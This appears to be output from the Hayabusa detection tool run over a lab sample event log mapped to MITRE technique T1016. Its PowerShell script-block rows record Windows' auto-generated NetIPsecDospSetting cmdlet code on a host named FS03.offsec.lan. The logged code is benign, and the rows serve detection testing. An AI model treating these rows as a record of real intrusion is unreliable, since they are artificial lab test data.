$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,")')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) 
DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $fa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( 